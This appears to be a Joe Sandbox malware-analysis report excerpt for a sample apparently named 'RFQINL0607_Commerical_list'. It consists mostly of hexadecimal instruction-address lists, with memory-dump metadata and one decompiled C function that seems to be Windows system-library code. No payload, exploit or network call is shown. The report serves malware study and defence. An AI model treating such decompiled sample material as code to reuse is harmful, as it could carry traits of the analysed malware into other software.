                                                                                                                                                                                  0x3336524d
                                                                                                                                                                                  0x33365843
                                                                                                                                                                                  0x33365849
                                                                                                                                                                                  0x33365849
                                                                                                                                                                                  0x33365255
                                                                                                                                                                                  0x33365852
                                                                                                                                                                                  0x33365852
                                                                                                                                                                                  0x3336525d
                                                                                                                                                                                  0x3336525f
                                                                                                                                                                                  0x33365261
                                                                                                                                                                                  0x33365263
                                                                                                                                                                                  0x33365263
                                                                                                                                                                                  0x3336526d
                                                                                                                                                                                  0x333b6c97
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33365296
                                                                                                                                                                                  0x33365296
                                                                                                                                                                                  0x33365299
                                                                                                                                                                                  0x3336529f
                                                                                                                                                                                  0x333652b6
                                                                                                                                                                                  0x333652b9
                                                                                                                                                                                  0x33365801
                                                                                                                                                                                  0x333652d4
                                                                                                                                                                                  0x333652d7
                                                                                                                                                                                  0x333b6a9c
                                                                                                                                                                                  0x333b6a9c
                                                                                                                                                                                  0x333652ef
                                                                                                                                                                                  0x333652f3
                                                                                                                                                                                  0x333652f7
                                                                                                                                                                                  0x333b6ae5
                                                                                                                                                                                  0x333b6ae8
                                                                                                                                                                                  0x33365595
                                                                                                                                                                                  0x33365595
                                                                                                                                                                                  0x33365599
                                                                                                                                                                                  0x33365865
                                                                                                                                                                                  0x33365882
                                                                                                                                                                                  0x33365884
                                                                                                                                                                                  0x33365886
                                                                                                                                                                                  0x333b6c0a
                                                                                                                                                                                  0x333b6c0e
                                                                                                                                                                                  0x333b6c10
                                                                                                                                                                                  0x333b6c1a
                                                                                                                                                                                  0x333b6c1a
                                                                                                                                                                                  0x33365582
                                                                                                                                                                                  0x33365582
                                                                                                                                                                                  0x3336552d
                                                                                                                                                                                  0x3336552d
                                                                                                                                                                                  0x33365533
                                                                                                                                                                                  0x333b6c8d
                                                                                                                                                                                  0x333b6c8d
                                                                                                                                                                                  0x33365544
                                                                                                                                                                                  0x33365546
                                                                                                                                                                                  0x3336554d
                                                                                                                                                                                  0x3336554e
                                                                                                                                                                                  0x3336554f
                                                                                                                                                                                  0x3336555a
                                                                                                                                                                                  0x3336555a
                                                                                                                                                                                  0x3336588c
                                                                                                                                                                                  0x33365892
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33365898
                                                                                                                                                                                  0x33365898
                                                                                                                                                                                  0x3336559f
                                                                                                                                                                                  0x333655a1
                                                                                                                                                                                  0x333655ec
                                                                                                                                                                                  0x333655ec
                                                                                                                                                                                  0x333655f0
                                                                                                                                                                                  0x333655f3
                                                                                                                                                                                  0x333655f5
                                                                                                                                                                                  0x333655f9
                                                                                                                                                                                  0x333655fc
                                                                                                                                                                                  0x33365669
                                                                                                                                                                                  0x33365671
                                                                                                                                                                                  0x3336567c
                                                                                                                                                                                  0x33365680
                                                                                                                                                                                  0x33365682
                                                                                                                                                                                  0x33365686
                                                                                                                                                                                  0x3336568a
                                                                                                                                                                                  0x3336568f
                                                                                                                                                                                  0x333b6c21
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6c21
                                                                                                                                                                                  0x33365695
                                                                                                                                                                                  0x3336569d
                                                                                                                                                                                  0x333656a1
                                                                                                                                                                                  0x333656a4
                                                                                                                                                                                  0x333656a8
                                                                                                                                                                                  0x333656aa
                                                                                                                                                                                  0x33365528
                                                                                                                                                                                  0x33365528
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333656b0
                                                                                                                                                                                  0x333656b0
                                                                                                                                                                                  0x333656b0
                                                                                                                                                                                  0x333656b2
                                                                                                                                                                                  0x333656b4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333656b6
                                                                                                                                                                                  0x333656b6
                                                                                                                                                                                  0x333656b6
                                                                                                                                                                                  0x333656ba
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333656bc
                                                                                                                                                                                  0x333656bf
                                                                                                                                                                                  0x333656c1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333656c1
                                                                                                                                                                                  0x333656c3
                                                                                                                                                                                  0x333656ca
                                                                                                                                                                                  0x333656d0
                                                                                                                                                                                  0x333656d4
                                                                                                                                                                                  0x333656d8
                                                                                                                                                                                  0x333656db
                                                                                                                                                                                  0x333656dd
                                                                                                                                                                                  0x333656e1
                                                                                                                                                                                  0x333656e4
                                                                                                                                                                                  0x333656e6
                                                                                                                                                                                  0x333656e9
                                                                                                                                                                                  0x333656eb
                                                                                                                                                                                  0x333656eb
                                                                                                                                                                                  0x333656ee
                                                                                                                                                                                  0x333656ee
                                                                                                                                                                                  0x333656e9
                                                                                                                                                                                  0x333656e4
                                                                                                                                                                                  0x333656fa
                                                                                                                                                                                  0x33365701
                                                                                                                                                                                  0x33365704
                                                                                                                                                                                  0x33365706
                                                                                                                                                                                  0x333b6c32
                                                                                                                                                                                  0x333b6c36
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6c38
                                                                                                                                                                                  0x333b6c3e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6c48
                                                                                                                                                                                  0x333b6c4d
                                                                                                                                                                                  0x333b6c52
                                                                                                                                                                                  0x333b6c56
                                                                                                                                                                                  0x333b6c58
                                                                                                                                                                                  0x333b6ba3
                                                                                                                                                                                  0x333b6ba3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6ba3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336570c
                                                                                                                                                                                  0x3336570c
                                                                                                                                                                                  0x33365716
                                                                                                                                                                                  0x33365723
                                                                                                                                                                                  0x33365728
                                                                                                                                                                                  0x3336572c
                                                                                                                                                                                  0x3336572f
                                                                                                                                                                                  0x33365731
                                                                                                                                                                                  0x33365736
                                                                                                                                                                                  0x33365748
                                                                                                                                                                                  0x3336574c
                                                                                                                                                                                  0x3336574c
                                                                                                                                                                                  0x3336574c
                                                                                                                                                                                  0x3336574c
                                                                                                                                                                                  0x33365736
                                                                                                                                                                                  0x33365758
                                                                                                                                                                                  0x3336575d
                                                                                                                                                                                  0x33365761
                                                                                                                                                                                  0x33365763
                                                                                                                                                                                  0x333b6c69
                                                                                                                                                                                  0x333b6c69
                                                                                                                                                                                  0x33365769
                                                                                                                                                                                  0x33365773
                                                                                                                                                                                  0x33365776
                                                                                                                                                                                  0x33365778
                                                                                                                                                                                  0x333b6c7e
                                                                                                                                                                                  0x333b6c7e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336577e
                                                                                                                                                                                  0x33365786
                                                                                                                                                                                  0x3336578a
                                                                                                                                                                                  0x33365790
                                                                                                                                                                                  0x33365795
                                                                                                                                                                                  0x33365797
                                                                                                                                                                                  0x3336580b
                                                                                                                                                                                  0x33365817
                                                                                                                                                                                  0x33365818
                                                                                                                                                                                  0x3336581a
                                                                                                                                                                                  0x3336581e
                                                                                                                                                                                  0x3336581f
                                                                                                                                                                                  0x33365820
                                                                                                                                                                                  0x33365820
                                                                                                                                                                                  0x33365828
                                                                                                                                                                                  0x3336582e
                                                                                                                                                                                  0x33365830
                                                                                                                                                                                  0x33365832
                                                                                                                                                                                  0x33365838
                                                                                                                                                                                  0x33365838
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33365832
                                                                                                                                                                                  0x33365799
                                                                                                                                                                                  0x3336579d
                                                                                                                                                                                  0x3336579f
                                                                                                                                                                                  0x333b6c73
                                                                                                                                                                                  0x333b6c75
                                                                                                                                                                                  0x333657a5
                                                                                                                                                                                  0x333657a5
                                                                                                                                                                                  0x333657a5
                                                                                                                                                                                  0x333657a8
                                                                                                                                                                                  0x333657a8
                                                                                                                                                                                  0x333657ac
                                                                                                                                                                                  0x333657ae
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333657b4
                                                                                                                                                                                  0x333657b4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333657b4
                                                                                                                                                                                  0x333657ae
                                                                                                                                                                                  0x33365778
                                                                                                                                                                                  0x33365706
                                                                                                                                                                                  0x333656b0
                                                                                                                                                                                  0x333655fe
                                                                                                                                                                                  0x33365603
                                                                                                                                                                                  0x33365606
                                                                                                                                                                                  0x33365608
                                                                                                                                                                                  0x3336560a
                                                                                                                                                                                  0x33365631
                                                                                                                                                                                  0x33365637
                                                                                                                                                                                  0x3336563a
                                                                                                                                                                                  0x3336563d
                                                                                                                                                                                  0x3336563f
                                                                                                                                                                                  0x33365643
                                                                                                                                                                                  0x33365646
                                                                                                                                                                                  0x33365648
                                                                                                                                                                                  0x3336564b
                                                                                                                                                                                  0x3336564d
                                                                                                                                                                                  0x3336564d
                                                                                                                                                                                  0x3336564d
                                                                                                                                                                                  0x3336564b
                                                                                                                                                                                  0x33365646
                                                                                                                                                                                  0x3336564e
                                                                                                                                                                                  0x33365651
                                                                                                                                                                                  0x33365655
                                                                                                                                                                                  0x33365657
                                                                                                                                                                                  0x33365657
                                                                                                                                                                                  0x3336565b
                                                                                                                                                                                  0x3336565f
                                                                                                                                                                                  0x3336565f
                                                                                                                                                                                  0x33365661
                                                                                                                                                                                  0x33365665
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336560c
                                                                                                                                                                                  0x3336560c
                                                                                                                                                                                  0x3336560f
                                                                                                                                                                                  0x3336560f
                                                                                                                                                                                  0x33365611
                                                                                                                                                                                  0x33365611
                                                                                                                                                                                  0x33365615
                                                                                                                                                                                  0x333657c6
                                                                                                                                                                                  0x333657c9
                                                                                                                                                                                  0x333657ce
                                                                                                                                                                                  0x333657d1
                                                                                                                                                                                  0x333657d4
                                                                                                                                                                                  0x333657d6
                                                                                                                                                                                  0x333657da
                                                                                                                                                                                  0x333657dd
                                                                                                                                                                                  0x333657df
                                                                                                                                                                                  0x333657e2
                                                                                                                                                                                  0x333657e8
                                                                                                                                                                                  0x333657e8
                                                                                                                                                                                  0x333657e2
                                                                                                                                                                                  0x333657dd
                                                                                                                                                                                  0x333657eb
                                                                                                                                                                                  0x333657ee
                                                                                                                                                                                  0x333657f2
                                                                                                                                                                                  0x333657fb
                                                                                                                                                                                  0x333657fb
                                                                                                                                                                                  0x333657f4
                                                                                                                                                                                  0x333657f4
                                                                                                                                                                                  0x3336561b
                                                                                                                                                                                  0x3336561e
                                                                                                                                                                                  0x33365621
                                                                                                                                                                                  0x33365623
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33365625
                                                                                                                                                                                  0x33365625
                                                                                                                                                                                  0x33365629
                                                                                                                                                                                  0x3336562d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336562d
                                                                                                                                                                                  0x33365623
                                                                                                                                                                                  0x3336560a
                                                                                                                                                                                  0x333655a3
                                                                                                                                                                                  0x333655a9
                                                                                                                                                                                  0x333655ad
                                                                                                                                                                                  0x333655b0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333655b2
                                                                                                                                                                                  0x333655b7
                                                                                                                                                                                  0x333655ba
                                                                                                                                                                                  0x333655bc
                                                                                                                                                                                  0x333655c0
                                                                                                                                                                                  0x333655c0
                                                                                                                                                                                  0x333655c4
                                                                                                                                                                                  0x333655c7
                                                                                                                                                                                  0x333655ca
                                                                                                                                                                                  0x333655dc
                                                                                                                                                                                  0x333655e4
                                                                                                                                                                                  0x333655e4
                                                                                                                                                                                  0x333655e4
                                                                                                                                                                                  0x333655cc
                                                                                                                                                                                  0x333655cf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333655d1
                                                                                                                                                                                  0x333655d4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333655d6
                                                                                                                                                                                  0x333655d8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333655da
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333655da
                                                                                                                                                                                  0x333655d8
                                                                                                                                                                                  0x333655c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333655bc
                                                                                                                                                                                  0x33365306
                                                                                                                                                                                  0x3336530a
                                                                                                                                                                                  0x33365324
                                                                                                                                                                                  0x333653d1
                                                                                                                                                                                  0x333653d3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333653d9
                                                                                                                                                                                  0x333653df
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333653e9
                                                                                                                                                                                  0x333653eb
                                                                                                                                                                                  0x333b6b36
                                                                                                                                                                                  0x333b6b39
                                                                                                                                                                                  0x333b6b3c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6b42
                                                                                                                                                                                  0x333b6b47
                                                                                                                                                                                  0x333b6b4a
                                                                                                                                                                                  0x333b6b4c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6b52
                                                                                                                                                                                  0x333b6b52
                                                                                                                                                                                  0x333b6b52
                                                                                                                                                                                  0x333b6b56
                                                                                                                                                                                  0x333b6b59
                                                                                                                                                                                  0x333b6b5c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6b62
                                                                                                                                                                                  0x333b6b65
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6b6b
                                                                                                                                                                                  0x333b6b6e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6b74
                                                                                                                                                                                  0x333b6b76
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6b78
                                                                                                                                                                                  0x333b6b52
                                                                                                                                                                                  0x333653f1
                                                                                                                                                                                  0x333653f9
                                                                                                                                                                                  0x33365401
                                                                                                                                                                                  0x333b6b7d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6b7d
                                                                                                                                                                                  0x3336540e
                                                                                                                                                                                  0x333b6b8b
                                                                                                                                                                                  0x333b6b95
                                                                                                                                                                                  0x333b6b97
                                                                                                                                                                                  0x333b6b9b
                                                                                                                                                                                  0x333b6b9d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33365414
                                                                                                                                                                                  0x33365414
                                                                                                                                                                                  0x33365418
                                                                                                                                                                                  0x33365420
                                                                                                                                                                                  0x33365439
                                                                                                                                                                                  0x33365446
                                                                                                                                                                                  0x33365451
                                                                                                                                                                                  0x33365460
                                                                                                                                                                                  0x33365472
                                                                                                                                                                                  0x3336547d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33365483
                                                                                                                                                                                  0x33365487
                                                                                                                                                                                  0x3336548e
                                                                                                                                                                                  0x333b6bad
                                                                                                                                                                                  0x333b6bb5
                                                                                                                                                                                  0x333b6bb9
                                                                                                                                                                                  0x33365494
                                                                                                                                                                                  0x33365494
                                                                                                                                                                                  0x33365494
                                                                                                                                                                                  0x33365496
                                                                                                                                                                                  0x333654a1
                                                                                                                                                                                  0x333654af
                                                                                                                                                                                  0x333654b7
                                                                                                                                                                                  0x333654c2
                                                                                                                                                                                  0x333654c3
                                                                                                                                                                                  0x333654ce
                                                                                                                                                                                  0x333654d9
                                                                                                                                                                                  0x333654e4
                                                                                                                                                                                  0x333654e9
                                                                                                                                                                                  0x333654ed
                                                                                                                                                                                  0x333654f1
                                                                                                                                                                                  0x333b6bc2
                                                                                                                                                                                  0x333b6bc5
                                                                                                                                                                                  0x333b6bc9
                                                                                                                                                                                  0x333b6bcf
                                                                                                                                                                                  0x333b6bd2
                                                                                                                                                                                  0x333b6be3
                                                                                                                                                                                  0x333b6be3
                                                                                                                                                                                  0x333b6bc9
                                                                                                                                                                                  0x33365503
                                                                                                                                                                                  0x3336550a
                                                                                                                                                                                  0x333b6bed
                                                                                                                                                                                  0x333b6bf9
                                                                                                                                                                                  0x333b6bfa
                                                                                                                                                                                  0x333b6bfc
                                                                                                                                                                                  0x333b6c00
                                                                                                                                                                                  0x333b6c01
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336550a
                                                                                                                                                                                  0x3336540e
                                                                                                                                                                                  0x3336532e
                                                                                                                                                                                  0x33365332
                                                                                                                                                                                  0x33365339
                                                                                                                                                                                  0x333b6af3
                                                                                                                                                                                  0x333b6afb
                                                                                                                                                                                  0x333b6aff
                                                                                                                                                                                  0x3336533f
                                                                                                                                                                                  0x3336533f
                                                                                                                                                                                  0x3336533f
                                                                                                                                                                                  0x33365341
                                                                                                                                                                                  0x33365349
                                                                                                                                                                                  0x33365357
                                                                                                                                                                                  0x3336535c
                                                                                                                                                                                  0x33365364
                                                                                                                                                                                  0x33365365
                                                                                                                                                                                  0x33365370
                                                                                                                                                                                  0x3336537b
                                                                                                                                                                                  0x3336538b
                                                                                                                                                                                  0x3336538d
                                                                                                                                                                                  0x33365393
                                                                                                                                                                                  0x333b6b08
                                                                                                                                                                                  0x333b6b0b
                                                                                                                                                                                  0x333b6b0f
                                                                                                                                                                                  0x333b6b15
                                                                                                                                                                                  0x333b6b18
                                                                                                                                                                                  0x333b6b2c
                                                                                                                                                                                  0x333b6b2c
                                                                                                                                                                                  0x333b6b0f
                                                                                                                                                                                  0x333653a8
                                                                                                                                                                                  0x333653af
                                                                                                                                                                                  0x3336557c
                                                                                                                                                                                  0x3336557e
                                                                                                                                                                                  0x33365580
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333653cd
                                                                                                                                                                                  0x333653cd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333653cd
                                                                                                                                                                                  0x333653af
                                                                                                                                                                                  0x33365300
                                                                                                                                                                                  0x33365586
                                                                                                                                                                                  0x33365589
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336558b
                                                                                                                                                                                  0x3336558f
                                                                                                                                                                                  0x333b6aa6
                                                                                                                                                                                  0x333b6aaa
                                                                                                                                                                                  0x333b6aad
                                                                                                                                                                                  0x333b6ad8
                                                                                                                                                                                  0x333b6ad8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6ad8
                                                                                                                                                                                  0x333b6aaf
                                                                                                                                                                                  0x333b6ab2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6ab4
                                                                                                                                                                                  0x333b6ab7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6abd
                                                                                                                                                                                  0x333b6ac0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6ac6
                                                                                                                                                                                  0x333b6aca
                                                                                                                                                                                  0x333b6acd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6acf
                                                                                                                                                                                  0x333b6ad2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6ad2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336558f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33365300
                                                                                                                                                                                  0x333652dd
                                                                                                                                                                                  0x333652e4
                                                                                                                                                                                  0x333b6a93
                                                                                                                                                                                  0x333b6a96
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6a96
                                                                                                                                                                                  0x333652ea
                                                                                                                                                                                  0x333652ea
                                                                                                                                                                                  0x333652ea
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333652b9
                                                                                                                                                                                  0x333652a1
                                                                                                                                                                                  0x333652a7
                                                                                                                                                                                  0x333b6a2a
                                                                                                                                                                                  0x333b6a2d
                                                                                                                                                                                  0x333b6a89
                                                                                                                                                                                  0x333b6a89
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6a89
                                                                                                                                                                                  0x333b6a2f
                                                                                                                                                                                  0x333b6a33
                                                                                                                                                                                  0x333b6a36
                                                                                                                                                                                  0x333b6a3d
                                                                                                                                                                                  0x333b6a3d
                                                                                                                                                                                  0x333b6a40
                                                                                                                                                                                  0x333b6a7f
                                                                                                                                                                                  0x333b6a7f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6a7f
                                                                                                                                                                                  0x333b6a42
                                                                                                                                                                                  0x333b6a46
                                                                                                                                                                                  0x333b6a49
                                                                                                                                                                                  0x333b6a50
                                                                                                                                                                                  0x333b6a50
                                                                                                                                                                                  0x333b6a53
                                                                                                                                                                                  0x333b6a6d
                                                                                                                                                                                  0x333b6a6f
                                                                                                                                                                                  0x333b6a79
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6a79
                                                                                                                                                                                  0x333b6a55
                                                                                                                                                                                  0x333b6a59
                                                                                                                                                                                  0x333b6a5c
                                                                                                                                                                                  0x333b6a63
                                                                                                                                                                                  0x333b6a63
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6a63
                                                                                                                                                                                  0x333b6a5e
                                                                                                                                                                                  0x333b6a61
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6a61
                                                                                                                                                                                  0x333b6a4b
                                                                                                                                                                                  0x333b6a4e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6a4e
                                                                                                                                                                                  0x333b6a38
                                                                                                                                                                                  0x333b6a3b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333652a7

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$@
                                                                                                                                                                                  • API String ID: 0-149943524
                                                                                                                                                                                  • Opcode ID: 73303b5f8ceb60049e6a6ea5cf5038b34d5c9fb168142902abaed7a7ca8b6c5f
                                                                                                                                                                                  • Instruction ID: cc98740f2227ee46ddef42cf1b7b6afdf49e1137c3a1483c07821aec118001a7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 73303b5f8ceb60049e6a6ea5cf5038b34d5c9fb168142902abaed7a7ca8b6c5f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 59329BB86483518FEB14CF15C8D0B2EB7F5AF88748F54892EF98687694E734D844CB92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33355622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                                  			E33355622(signed int __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				void* __ebx;
				void* _t32;
				void* _t33;
				intOrPtr* _t36;
				char* _t52;
				intOrPtr _t55;
				void* _t72;
				signed int _t78;

				_push(__ecx);
				_t72 = __edx;
				_t75 = __ecx;
				if(_a4 == 0x102) {
					_t32 = E33357072(__ecx, __edx, 0);
					if(_t32 != 0) {
						L3:
						_t33 = L33363C40();
						_t52 = 0x7ffe0386;
						if(_t33 != 0) {
							_t36 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t36 = 0x7ffe0386;
						}
						if( *_t36 != 0) {
							L33424C59( *((intOrPtr*)(_t72 + 0x5c)), _t72 + 0xf8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						}
						E33356F4C( &_v8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						 *((intOrPtr*)(_t75 + 0x30)) =  *((intOrPtr*)(_t72 + 0x30));
						 *((intOrPtr*)(_t75 + 0x34)) =  *((intOrPtr*)(_t72 + 0x34));
						 *0x334491e0(_t75,  *((intOrPtr*)(_t72 + 0x34)), _t72, _a4);
						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x30))))();
						if(L33363C40() != 0) {
							_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						}
						if( *_t52 != 0) {
							L33424CD2( *((intOrPtr*)(_t72 + 0x5c)), _t72 + 0xf8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						}
						_t32 = E33356ECF(_v8);
						L9:
						return _t32;
					}
					goto L9;
				}
				_t55 =  *((intOrPtr*)(__edx + 0x58));
				if(_t55 != 0) {
					if(E33372120(_t55, __ecx, 0, _t55) >= 0) {
						 *(__ecx + 0x50) =  *(__ecx + 0x50) | 0x00000100;
						 *((intOrPtr*)(__ecx + 0x64)) = _t55;
						goto L2;
					}
					_t78 = __ecx | 0xffffffff;
					_t32 = E3337DB40(_t72 + 0x20, _t78, 0);
					asm("lock xadd [edi], esi");
					if(_t78 == 1) {
						 *0x334491e0(_t72);
						_t32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t72 + 4))))))();
					}
					goto L9;
				}
				L2:
				E33357007(_t75, _t72);
				goto L3;
			}












                                                                                                                                                                                  0x33355627
                                                                                                                                                                                  0x33355632
                                                                                                                                                                                  0x33355634
                                                                                                                                                                                  0x33355636
                                                                                                                                                                                  0x333556c7
                                                                                                                                                                                  0x333556ce
                                                                                                                                                                                  0x33355650
                                                                                                                                                                                  0x33355650
                                                                                                                                                                                  0x33355655
                                                                                                                                                                                  0x3335565c
                                                                                                                                                                                  0x333b0642
                                                                                                                                                                                  0x33355662
                                                                                                                                                                                  0x33355662
                                                                                                                                                                                  0x33355662
                                                                                                                                                                                  0x33355668
                                                                                                                                                                                  0x333b065e
                                                                                                                                                                                  0x333b065e
                                                                                                                                                                                  0x3335567a
                                                                                                                                                                                  0x33355685
                                                                                                                                                                                  0x3335568c
                                                                                                                                                                                  0x33355698
                                                                                                                                                                                  0x3335569e
                                                                                                                                                                                  0x333556a7
                                                                                                                                                                                  0x333b0671
                                                                                                                                                                                  0x333b0671
                                                                                                                                                                                  0x333556b0
                                                                                                                                                                                  0x333b068e
                                                                                                                                                                                  0x333b068e
                                                                                                                                                                                  0x333556b9
                                                                                                                                                                                  0x333556be
                                                                                                                                                                                  0x333556c2
                                                                                                                                                                                  0x333556c2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333556d0
                                                                                                                                                                                  0x3335563c
                                                                                                                                                                                  0x33355641
                                                                                                                                                                                  0x333b05f9
                                                                                                                                                                                  0x333b062a
                                                                                                                                                                                  0x333b0631
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b0631
                                                                                                                                                                                  0x333b05fb
                                                                                                                                                                                  0x333b0605
                                                                                                                                                                                  0x333b060a
                                                                                                                                                                                  0x333b060f
                                                                                                                                                                                  0x333b061d
                                                                                                                                                                                  0x333b0623
                                                                                                                                                                                  0x333b0623
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b060f
                                                                                                                                                                                  0x33355647
                                                                                                                                                                                  0x3335564b
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
